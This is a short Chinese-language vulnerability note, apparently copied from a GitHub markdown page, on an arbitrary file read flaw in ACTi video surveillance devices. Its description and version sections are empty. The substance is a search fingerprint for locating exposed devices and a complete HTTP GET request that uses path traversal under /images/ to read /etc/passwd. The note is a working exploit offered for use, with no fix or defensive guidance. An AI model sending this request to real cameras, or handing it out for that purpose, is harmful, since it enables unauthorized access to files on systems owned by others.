ACTI-视频监控images存在任意文件读取漏洞

一、漏洞描述

二、影响版本

ACTI

三、资产测绘

app="ACTi-视频监控"

四、漏洞复现

GET /images/../../../../../../../../etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

更新: 2024-08-12 17:48:53
原文: https://www.yuque.com/xiaokp7/ocvun2/mh7ce3oc3gcp5th4

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ACTI-视频监控images存在任意文件读取漏洞.md

ACTI-视频监控images存在任意文件读取漏洞.md

ACTI-视频监控images存在任意文件读取漏洞

一、漏洞描述

二、影响版本

三、资产测绘

四、漏洞复现

Files

ACTI-视频监控images存在任意文件读取漏洞.md

Latest commit

History

ACTI-视频监控images存在任意文件读取漏洞.md

File metadata and controls

ACTI-视频监控images存在任意文件读取漏洞

一、漏洞描述

二、影响版本

三、资产测绘

四、漏洞复现